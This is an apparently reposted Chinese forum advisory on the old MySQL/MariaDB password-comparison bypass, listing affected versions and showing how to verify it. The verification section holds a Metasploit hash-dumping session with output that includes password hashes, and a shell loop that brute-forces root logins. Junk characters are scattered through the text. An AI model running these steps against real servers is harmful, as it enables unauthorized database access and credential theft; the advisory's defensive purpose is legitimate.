mysql任意用户密码概率登陆漏洞

admin

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。
- q- C+ G7 a7 k7 K
) o1 x/ X+ l! R也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。
+ y* z, S4 g- ]# k
7 {9 t1 [) m. {3 v1 L6 n/ f受影响的产品：
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
2 H" A' M* d) `0 o/ s* l/ h4 E, Bvulnerable.
* x6 t' V% Z; t. f% D) c; j7 }MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
$ y4 A; l( w# _/ b( M6 }. ?MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

# H7 e) J5 D' i8 f% \9 H验证方法：
5 r) T' b" I* w% |" s: h" x! J* s
$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
. F& Y% E" s' A
9 K4 b2 E  E6 D/ s& ]* L' a $ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>